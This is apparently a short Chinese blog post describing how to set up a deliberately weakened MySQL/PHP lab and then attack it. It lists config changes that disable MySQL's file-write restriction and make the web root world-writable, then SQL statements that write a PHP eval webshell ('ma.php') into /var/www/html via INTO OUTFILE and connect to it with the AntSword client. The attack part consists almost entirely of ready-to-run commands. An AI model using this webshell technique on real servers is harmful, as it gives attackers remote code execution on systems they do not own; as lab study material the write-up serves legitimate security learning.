MySQL靶场&攻击

靶场搭建

修改配置文件

vim /etc/my.cof

[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1

安装相关环境

yum install php php-mysql -y

添加配置

vim /etc/httpd/conf/httpd.conf

AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php

重启相关服务

systemctl restart httpd

修改权限

chmod -R o+w /var/www

攻击

use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

访问 IP/ma.php

蚁剑连接

作 者:PeiyuJue

链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
南城花随雪。6 分钟前
硬盘(HDD)与固态硬盘(SSD)详细解读
数据库
儿时可乖了7 分钟前
使用 Java 操作 SQLite 数据库
java·数据库·sqlite
懒是一种态度9 分钟前
Golang 调用 mongodb 的函数
数据库·mongodb·golang
天海华兮11 分钟前
mysql 去重 补全 取出重复 变量 函数 和存储过程
数据库·mysql
Koi慢热28 分钟前
路由基础(全)
linux·网络·网络协议·安全
gma9991 小时前
Etcd 框架
数据库·etcd
爱吃青椒不爱吃西红柿‍️1 小时前
华为ASP与CSP是什么?
服务器·前端·数据库
Yz98762 小时前
hive的存储格式
大数据·数据库·数据仓库·hive·hadoop·数据库开发
武子康2 小时前
大数据-231 离线数仓 - DWS 层、ADS 层的创建 Hive 执行脚本
java·大数据·数据仓库·hive·hadoop·mysql
黑色叉腰丶大魔王2 小时前
《MySQL 数据库备份与恢复》
mysql